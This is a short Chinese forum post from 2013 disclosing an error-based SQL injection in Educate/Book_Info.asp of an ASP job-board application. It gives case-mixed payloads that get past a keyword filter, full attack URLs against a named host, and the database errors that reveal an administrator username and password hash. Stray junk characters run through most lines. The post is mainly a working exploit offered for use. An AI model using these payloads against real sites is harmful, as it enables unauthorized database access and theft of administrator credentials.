漏洞出现在Educate/Book_Info.asp
" N- C1 T$ {9 q此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出' M% d7 B: d# F; }0 x9 n
exp:如下
v2 v z7 K# U4 _- ]查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
7 x, p0 s9 P0 @查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 o9 T' }& X: ~- A2 f& ahttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
6 t. u8 H3 {- F$ C5 X$ uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'+ Z E& `4 v: D G( p8 j$ z! ]
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ V& \8 }! m/ d7 u
/Educate/Book_Info.asp,行 8
$ ]& i' }8 }$ Z3 d) a4 Shttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 g9 y) W8 C6 _! y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# Y' U) g8 ]$ w: Y! H) p0 A将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% }, j9 d/ o# Z: G( H8 ^
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
分享
支持
反对